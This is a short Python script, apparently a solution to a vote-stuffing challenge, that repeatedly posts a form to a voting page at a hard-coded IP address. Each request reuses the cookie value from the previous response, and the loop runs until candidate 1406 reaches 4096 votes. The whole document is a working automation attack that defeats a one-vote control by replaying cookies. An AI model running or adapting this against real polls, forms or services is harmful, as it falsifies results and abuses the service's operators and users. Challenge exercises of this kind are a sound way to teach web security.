#!/usr/bin/python3
import requests


header =  {'Content-Type': 'application/x-www-form-urlencoded',}
URL = "http://158.69.76.135/level1.php"
payload = {'id': '1406', 'holdthedoor': 'Submit+Query', 'key': '0'}
cookies = {'HoldTheDoor': '0'}


r = requests.get(URL)



while "1406    </td>\n    <td>\n4096" not in r.text:
    cookies['holdthedoor'] = r.cookies['HoldTheDoor']
    r = requests.post(URL, data=payload, headers=header, cookies=cookies)
    if r.status_code == 200:
        print("The request has succeeded.")
    else:
        print("The request has fail.")
        break
